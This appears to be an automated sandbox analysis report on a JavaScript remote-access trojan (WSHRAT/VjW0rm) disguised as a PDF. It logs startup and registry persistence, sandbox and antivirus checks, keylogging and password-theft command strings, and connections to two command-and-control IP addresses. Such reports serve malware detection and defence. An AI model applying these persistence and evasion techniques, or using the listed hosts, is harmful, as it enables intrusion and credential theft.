Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA

Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 34003198			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 34003198			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.js

Static PE information: 34003198.pdf.js

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 1604

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895272913.0000020BE1D2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW/b
Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895073011.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895272913.0000020BE1D2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2074574369.00000221C11D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000006.00000003.2074574369.00000221C11D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWG
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW.
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RA

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 94.156.71.108 1604
Source: C:\Windows\System32\wscript.exe	Network Connect: 109.248.151.106 5401			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894450811.0000020BE2044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895295189.0000020BE2044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected VjW0rm

Source: Yara match	File source: amsi64_2316.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3084.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_5428.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_5228.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6540.amsi.csv, type: OTHER

Yara detected WSHRAT

Source: Yara match	File source: amsi64_4108.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3168.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3052.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_2108.amsi.csv, type: OTHER
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 3168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 3052, type: MEMORYSTR

Remote Access Functionality

Detected WSHRat

Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string take-log

Yara detected VjW0rm

Source: Yara match	File source: amsi64_2316.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3084.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_5428.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_5228.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6540.amsi.csv, type: OTHER

Yara detected WSHRAT

Source: Yara match	File source: amsi64_4108.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3168.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3052.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_2108.amsi.csv, type: OTHER
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
